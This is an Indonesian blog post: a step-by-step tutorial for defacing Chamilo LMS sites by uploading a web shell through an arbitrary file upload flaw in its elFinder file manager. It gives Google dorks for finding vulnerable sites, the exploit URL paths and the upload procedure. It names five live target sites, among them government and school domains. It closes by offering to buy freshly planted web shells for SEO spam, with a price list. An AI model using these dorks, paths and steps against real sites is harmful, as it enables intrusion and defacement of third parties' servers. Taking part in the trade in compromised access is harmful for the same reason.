stats counter free Deface Metode Chamilo LMS Shell Upload - Blogpongo
Endang Saya adalah lulusan SMK yang punya hobi dengan dunia Jurnalistik, Teknologi, Travel dan saya tulis semuanya di blog ini.

Deface Metode Chamilo LMS Shell Upload

1 min read

tutorial deface chamilio

Halo semuanya selamat datang di blogpongo, sudah lama gak buat tutorial deface, kali ini saya akan memberikan tutorial deface Metode Chamilo LMS Shell Upload (Elfinder).

Seperti biasa saya akan menjelaskan terlebih dahulu tentang cmd ini, jika ingin ke tutorialnya silakan scrool kebawah langsung.

Apa Itu Chamilo LMS

Chamilo is a free software e-learning and content management system, aimed at improving access to education and knowledge globally. Wikipedia

Yup lebih singkatnya chamilo ini merupakan cms elearning atau belajar online lebih detail silakan baca di website resminya https://chamilo.org/en/

Deface Metode Chamilo LMS Shell Upload

Sekarang kebagian intinya, namun sebelum itu kalian harus mengetahui lebih jelas hal berikut ini

Detail POC Chamilo Arbitrary File Upload

  • Exploit Title: Chamilo LMS Arbitrary File Upload
  • Date: 05/10/2018
  • Exploit Author: Sohel Yousef jellyfish security team
  • Software Link: https://chamilo.org/en/download/
  • Version: Chamilo 1.11.8 or to 1.9
  • Category: webapps

Meski ini metode ditemukan pada 2018 atau 2 tahun lalu namun masih banyak website yang memiliki bug ini.

Google Dork Chamilo Arbitrary File Upload

Dan berikut ini adalah google dorknya

  • intext:”powered by chamilo”
  • inurl:/main/auth/inscription.php
  • inurl:/chamilo/ “Sign Up” ext:php
  • (silakan kembangkan lagi bro)

Payload / Exploit Chamilo Arbitrary File Upload

dan beriku ini adalah payload ataupun exploit nya.

  • site.com/path/main/social/myfiles.php
  • site.com/path/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0

Proof Of Concept Chamilo Arbitrary File Upload

  • Seperti biasa kalian dorking dahulu dengan google / duduckgo dengan dork di atas.
  • jika sudah mendapatkan target yang kalian inginkan, lanjut dengan melakukan pendaftaran terlebih dahulu di site.com/path/main/auth/inscription.php
deface-chamilio
deface-chamilio
  • Jika sudah mengisi pendaftaran sekarang lanjut dengan mengakses elfinder manager/ajax file manager, caranya masukan exploit di atas site.com/path/main/social/myfiles.php
  • Nah dan sekarang keliatan tuh file managernya lanjut dengan mengupload shell kalian.
  • dan boom kalian shell / script kalian berhasil di upload

Akses Shell / Script Chamilo LMS

untuk mengaksesnya cukup mudah sekali kalian bisa dengan cara mengklik kanan dan get info saja.

Kesimpulan

Kesimpulan dari tutorial ini adalah metode ini sangat udah dan sederhana (tingal klik klik) dan untuk upload shell saya belum menemukan bypassnya saya sudah mencoba phtml, php7,php5, gif.php dan juga memasukan GIF89;aGIF89;aGIF89;a namun saya belum mencoba tamper data.

Referensi

Live Target

Dan beriku ini livetarget biar gak di kira boong heheh

  • https://learn.beeznest.com/
  • https://eialive.co.uk/
  • http://krisna.stikeskendal.ac.id/
  • https://disdik.bekasikota.go.id/
  • http://simudik.bdksemarang.net/

Jika kalian punya akun premium publicwww kalian bisa mendapatkan 700 lebih website

Tambahan

Jika kalian berhasil mengupload webshell saran saya jangan di tebas indexnya mending jual ke saya

Need WEBSHELL for seo minimal da 31+ (domain authority ) berikut list hargnya

  • 31-50 = $5
  • 51-65 = $10
  • 66+ = $15-20

Dengan syarat webshell kalian fresh bukan bekasan, silakan hubungi saya di facebook : https://facebook.com/esevenbid

0 Shares
Endang Saya adalah lulusan SMK yang punya hobi dengan dunia Jurnalistik, Teknologi, Travel dan saya tulis semuanya di blog ini.
Panduan seputar Blogging, Adsense, SEO, Template Dan Tips & Trik Blog KangBlogger